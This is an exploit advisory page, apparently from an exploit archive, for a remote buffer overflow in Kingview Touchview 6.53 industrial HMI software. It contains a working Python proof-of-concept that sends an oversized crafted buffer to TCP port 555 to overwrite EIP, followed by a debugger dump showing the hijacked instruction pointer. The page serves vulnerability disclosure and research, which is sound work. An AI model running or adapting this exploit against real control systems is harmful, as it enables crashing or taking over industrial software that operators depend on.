Kingview Touchview 6.53 EIP Overwrite

2012.06.26
Credit: Carlos Mario Penagos Hollmann
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Kingview Touchview EIP direct control # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.kingview.com # Version: 6.53 # Tested on: Windows SP 1 # CVE : Open kingivew click on Make choose network configuration--->network parameter , then go to the node type and choose Local is a Login Server, run the demo port 555 will be open. NOTE: This was already patched by the vendor silently. import os import socket import sys host ="10.0.2.15" port = 555 exploit = ("\x90"*1024) exploit += ("A"*23976) exploit += ("B"*12500) exploit += ("D"*6250) exploit += ("E"*6002) exploit += ("\x44\x43\x42\x41") exploit += ("\x90"*256) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(exploit) data = s.recv(1024) print " [+] Closing connection.." s.close() print " [+] Done!" eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344 edi=0012f6b4 eip=41424344 esp=0012f650 ebp=0012f678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 41424344 ?? CALL TO STACK 0x41424344 USER32!GetDC+0x6d USER32!EnumDisplaySettingsA+0x27d USER32!EnumDisplaySettingsA+0xc9 USER32!DefDlgProcA+0x22

References:

http://www.kingview.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top